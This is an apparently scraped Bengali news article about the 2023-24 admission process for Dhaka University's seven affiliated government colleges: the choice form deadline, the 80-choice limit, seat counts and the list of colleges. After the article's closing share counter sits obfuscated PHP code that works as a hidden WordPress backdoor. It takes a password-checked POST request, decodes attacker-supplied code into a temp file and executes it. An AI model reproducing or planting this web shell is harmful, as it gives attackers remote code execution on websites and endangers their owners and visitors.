ঢাবি অধিভুক্ত সাত কলেজ ভর্তি : কলেজ ও বিষয় পছন্দক্রম শুরু


শিক্ষা সংবাদ প্রকাশের সময় : মে ৩০, ২০২৪, ৯:১৭ পূর্বাহ্ণ /
ঢাবি অধিভুক্ত সাত কলেজ ভর্তি : কলেজ ও বিষয় পছন্দক্রম শুরু
0Shares

ঢাকা বিশ্ববিদ্যালয়ের অধিভুক্ত সরকারি সাত কলেজের ২০২৩-২৪ শিক্ষাবর্ষে আন্ডারগ্র্যাজুয়েট প্রোগ্রামের ভর্তি পরীক্ষায় উত্তীর্ণ ভর্তিচ্ছুক শিক্ষার্থীদের কলেজ ও বিষয় পছন্দক্রম শুরু হয়েছে আজ যা আগামী ২৩ জুন ২০২৪ খ্রি. পর্যন্ত চলবে।

বুধবার (২৯ মে) ঢাকা বিশ্ববিদ্যালয় ভর্তি কমিটির চেয়ারম্যান অধ্যাপক মো. মোস্তাফিজুর রহমান তথ্যটি নিশ্চিত করেছেন।

ভর্তি পরীক্ষায় উত্তীর্ণ শিক্ষার্থীরা সংশ্লিষ্ট ওয়েবসাইটে (https://collegeadmission.eis.du.ac.bd) লগ-ইন করে ভর্তির প্রাথমিক আবেদনের বিস্তারিত ফরম ও ভর্তিযোগ্য বিষয়সমূহের পছন্দক্রম ফরম অনলাইনের মাধ্যমে পূরণ করতে পারবে। পছন্দক্রম ফরম পরবর্তীতে আর কোনো অবস্থাতেই পরিবর্তন করা যাবে না। পূরণকৃত ফরম অবশ্যই প্রিন্ট করে সংরক্ষণ করতে হবে।

একজন আবেদনকারী কলেজ ও বিষয়ের সমন্বয়ে ৮০টি চয়েজ দিতে পারবে। তবে শিক্ষার্থী ভর্তির ক্ষেত্রে ইডেন মহিলা কলেজ এবং বেগম বদরুন্নেসা সরকারি মহিলা কলেজের আসনগুলো শুধু ছাত্রীদের এবং ঢাকা কলেজের আসনগুলো শুধু ছাত্রদের জন্য সংরক্ষিত। অন্যদিকে কোটাধারী শিক্ষার্থীদেরকে ৬ জুনের মধ্যে অনলাইনে পূরণকৃত চয়েজ ফরম সংশ্লিষ্ট ডিন অফিসে জমা দিতে হবে।

অধ্যাপক মোস্তাফিজুর রহমান বলেন, ‍‍`আজ থেকে সরকারি সাত কলেজের ২০২৩-২০২৪ শিক্ষাবর্ষে আন্ডারগ্র্যাজুয়েট প্রোগ্রামের ভর্তি পরীক্ষায় উত্তীর্ণ ভর্তিচ্ছুদের বিষয় পছন্দক্রম শুরু হয়েছে। বাণিজ্য এবং কলা ও সামাজিক বিজ্ঞান ইউনিটের নোটিশ ওয়েবসাইটে প্রকাশিত হয়েছে। পর্যায়ক্রমে বিজ্ঞান ইউনিটের নোটিশও প্রকাশিত হবে। নির্ধারিত সময়ের মধ্যে কোনো প্রার্থী বিষয় পছন্দক্রম ফরম পূরণ না করলে পরবর্তীতে আর বিষয় মনোনয়ন দেওয়া হবে না।‍‍`

এবছর সাত কলেজের ভর্তি পরীক্ষায় তিন ইউনিটে মোট আবেদন পড়েছে প্রায় ১ লাখের অধিক। এবার আসন প্রতি লড়াই করেছেন প্রায় ৫ জন। গত বছরের ন্যায় এবারও সমান সংখ্যক আসনের ভিত্তিতে ভর্তি প্রক্রিয়া অনুষ্ঠিত হয়েছিল। সরকারি সাত কলেজে মোট আসন সংখ্যা ২১ হাজার ৫১৩ টি। এর মধ্যে বিজ্ঞান ইউনিটে মোট আসন সংখ্যা ৬ হাজার ৫০০ টি, বাণিজ্য ইউনিটে ৪ হাজার ৮৯২টি এবং কলা ও সমাজবিজ্ঞান ইউনিটে আসন সংখ্যা ৯ হাজার ৭০৩ টি। তবে শিক্ষার্থী ভর্তির ক্ষেত্রে ইডেন মহিলা কলেজ এবং বেগম বদরুন্নেসা সরকারি মহিলা কলেজের আসনগুলো শুধু ছাত্রীদের এবং ঢাকা কলেজের আসনগুলো শুধু ছাত্রদের জন্য সংরক্ষিত।

উল্লেখ্য, ঢাকা বিশ্ববিদ্যালয়ের অধিভুক্ত সরকারি সাতটি কলেজ যথাক্রমে- ঢাকা কলেজ, ইডেন মহিলা কলেজ, সরকারি শহীদ সোহরাওয়ার্দী কলেজ, বেগম বদরুন্নেসা সরকারি মহিলা কলেজ, সরকারি তিতুমীর কলেজ, কবি নজরুল সরকারি কলেজ ও সরকারি বাঙলা কলেজ।

0Shares
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}